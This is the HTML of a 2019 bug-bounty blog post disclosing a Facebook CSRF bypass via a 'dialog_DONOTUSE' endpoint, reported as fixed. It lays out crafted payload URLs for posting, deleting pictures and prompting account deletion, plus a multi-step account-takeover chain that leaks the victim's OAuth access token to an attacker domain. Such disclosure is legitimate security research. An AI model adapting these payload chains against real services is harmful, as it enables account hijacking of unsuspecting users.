<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Facebook CSRF protection bypass which leads to Account Takeover. | Youssef Sammouda (sam0) personal blog</title>
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="Facebook CSRF protection bypass which leads to Account Takeover." />
<meta name="author" content="qw" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="This bug could have allowed malicious users to send requests with CSRF tokens to arbitrary endpoints on Facebook which could lead to takeover of victims accounts. In order for this attack to be effective, an attacker would have to trick the target into clicking on a link." />
<meta property="og:description" content="This bug could have allowed malicious users to send requests with CSRF tokens to arbitrary endpoints on Facebook which could lead to takeover of victims accounts. In order for this attack to be effective, an attacker would have to trick the target into clicking on a link." />
<link rel="canonical" href="http://localhost:4000/2019/02/12/facebook-csrf-protection-bypass-which-leads-to-account-takeover.html" />
<meta property="og:url" content="http://localhost:4000/2019/02/12/facebook-csrf-protection-bypass-which-leads-to-account-takeover.html" />
<meta property="og:site_name" content="Youssef Sammouda (sam0) personal blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2019-02-12T19:03:15+01:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Facebook CSRF protection bypass which leads to Account Takeover." />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"qw"},"dateModified":"2019-02-12T19:03:15+01:00","datePublished":"2019-02-12T19:03:15+01:00","description":"This bug could have allowed malicious users to send requests with CSRF tokens to arbitrary endpoints on Facebook which could lead to takeover of victims accounts. In order for this attack to be effective, an attacker would have to trick the target into clicking on a link.","headline":"Facebook CSRF protection bypass which leads to Account Takeover.","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2019/02/12/facebook-csrf-protection-bypass-which-leads-to-account-takeover.html"},"url":"http://localhost:4000/2019/02/12/facebook-csrf-protection-bypass-which-leads-to-account-takeover.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Youssef Sammouda (sam0) personal blog" /></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">Youssef Sammouda (sam0) personal blog</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">Facebook CSRF protection bypass which leads to Account Takeover.</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2019-02-12T19:03:15+01:00" itemprop="datePublished">Feb 12, 2019
      </time>• <span itemprop="author" itemscope itemtype="http://schema.org/Person"><span class="p-author h-card" itemprop="name">qw</span></span></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p>This bug could have allowed malicious users to send requests with CSRF tokens to arbitrary endpoints on Facebook which could lead to takeover of victims accounts. In order for this attack to be effective, an attacker would have to trick the target into clicking on a link.</p>

<p><strong>Demonstration</strong></p>

<p>This is possible because of a vulnerable endpoint which takes another given Facebook endpoint selected by the attacker along with the parameters and make a POST request to that endpoint after adding the fb_dtsg parameter. Also this endpoint is located under the main domain <a href="https://www.facebook.com/">www.facebook.com</a> which makes it easier for the attacker to trick his victims to visit the URL.</p>

<p>The vulnerable endpoint is: <br />
https://www.facebook.com/comet/dialog_DONOTUSE/?url=XXXX where XXXX is the endpoint with parameters where the POST request is going to be made (the CSRF token fb_dtsg is added automatically to the request body).</p>

<p>This allowed me to make many actions if the victim visits this URLs. Some of these are:</p>

<p><strong>Make a post on timeline:</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://www.facebook.com/comet/dialog_DONOTUSE/?url=
/api/graphql/%3fdoc_id=1740513229408093%26variables={"input":{"actor_id":{TARGET_ID},"client_mutation_id":"1","source":"WWW","audience":{"web_privacyx":"REDECATED"},"message":{"text":"TEXT","ranges":[]}}}
</code></pre></div></div>

<p><strong>Delete Profile Picture:</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://www.facebook.com/comet/dialog_DONOTUSE/?
url=/profile/picture/remove_picture/%3fdelete_from_album=1%26profile_id={TARGET_ID} 
</code></pre></div></div>

<p><strong>Trick user to delete their account (After changing language with “locale” parameter)</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://www.facebook.com/comet/dialog_DONOTUSE/?
url=/help/delete_account/dialog/%3f__asyncDialog=0%26locale=fr_FR
</code></pre></div></div>

<p>This will promote a password confirmation dialog, if the victim enters his password then his account will be deleted.</p>

<p><strong>Account Takeover Approach</strong></p>

<p>To takeover the account, we have to add a new email address or phone number to the victim account. The problem here is that the victim has to visit two separate URLs , one to add the email/phone and one to confirm it because the “normal” endpoints used to add emails or phone numbers don’t have a “next” parameter to redirect the user after a successful request.<br />
So to bypass this, i needed to find endpoints where the “next” parameter is present so the account takeover could be made with a single URL.</p>

<p><strong>1)</strong> We authorize the attacker app as the user then we redirect to <strong>https://www.facebook.com/v3.2/dialog/oauth</strong> which will automatically redirect to the attacker website with access_token having the scopes allowed to that app (this happens without user interaction because the app is already authorized using the endpoint <strong>/ajax/appcenter/redirect_to_app</strong>).<br />
This URL should be sent to the user:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://www.facebook.com/comet/dialog_DONOTUSE/?url=
/ajax/appcenter/redirect_to_app%3fapp_id={ATTACKER_APP}%26ref=appcenter_top_grossing%26redirect_uri=https%3a//www.facebook.com/v3.2/dialog/oauth%3fresponse_type%3dtoken%26client_id%3d{ATTACKER_APP}%26redirect_uri%3d{DOUBLE_URL_ENCODED_LINK}%26scope%3d&amp;preview=0&amp;fbs=125&amp;sentence_id&amp;gift_game=0&amp;scopes[0]=email&amp;gdpv4_source=dialog
</code></pre></div></div>

<p>This step is needed for multiple things:<br />
First to use the endpoint <strong>/v3.2/dialog/oauth</strong> to bypass Facebook redirect protection in the “next” parameter which blocks redirecting attempts to external websites even if they are made using linkshim.<br />
Second to identify each victim using the token received which will help later to extract the confirmation code for that specific user.</p>

<p><strong>2)</strong>The attacker website receives the access token of the user , creates an email for him under that domain and redirect the user to :</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://www.facebook.com/comet/dialog_DONOTUSE/?
url=/add_contactpoint/dialog/submit/%3fcontactpoint={EMAIL_CHOSEN}%26next=
/v3.2/dialog/oauth%253fresponse_type%253dtoken%2526client_id%253d{ATTACKER_APP}%2526redirect_uri%253d{DOUBLE_URL_ENCODED_LINK]
</code></pre></div></div>

<p>This URL does the follow:<br />
First it links an email to the user account using the endpoint <strong>/add_contactpoint/dialog/submit/</strong> (no password confirmation is required). <br />
After the linking, it redirects to the selected endpoint in “next” paramter:</p>

<p><code class="language-plaintext highlighter-rouge">"/v3.2/dialog/oauth?response_type=token&amp;client_id={ATTACKER_APP}&amp;redirect_uri={ATTACKER_DOMAIN}" </code></p>

<p>which will redirect to the “ATTACKER_DOMAIN” again with the user access_token.</p>

<p><strong>3)</strong> The attacker website receives the “access_token”, extract the user ID then search for the email received for that user and gets the confirmation link then redirects again to :</p>

<p><code class="language-plaintext highlighter-rouge"> https://www.facebook.com/confirmcontact.php?c={CODE}&amp;z=0&amp;gfid={HASH}</code></p>

<p>(CODE and HASH are in the email received from Facebook)</p>

<p>This method is simpler for the attacker but after the linking the endpoint redirects the victim to <strong>https://www.facebook.com/settings?section=email</strong> which expose the newly added email so the confirmation could be done using the <strong>/confirm_code/dialog/submit/</strong> endpoint which have a “next” parameter that could redirect the victim to the home page after the confirmation is made.</p>

<p><strong>4)</strong> The email is now added to the victim account, the attacker could reset the password and takeover the account.</p>

<p>The attack seems long but it’s done in a blink of an eye and it’s dangerous because it doesn’t target a specific user but anyone who visits the link in step 1 <br />
(This is done with simple scripts hosted in the attacker website)</p>

<p><strong>Timeline</strong></p>

<p>Jan 26, 2019 — Report Sent<br />
Jan 26, 2019— Acknowledged by Facebook<br />
Jan 28, 2019 — More details sent<br />
Jan 31, 2019— Fixed by Facebook<br />
Feb 12, 2019 — Bounty Awarded by Facebook</p>

  </div><a class="u-url" href="/2019/02/12/facebook-csrf-protection-bypass-which-leads-to-account-takeover.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">Youssef Sammouda (sam0) personal blog</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">Youssef Sammouda (sam0) personal blog</li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a href="https://github.com/samm0uda"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">samm0uda</span></a></li><li><a href="https://www.twitter.com/samm0uda"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg> <span class="username">samm0uda</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p>The goal of this blog is to share write-ups about bugs i have found in Facebook and reported to them under the Facebook bug bounty program.</p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
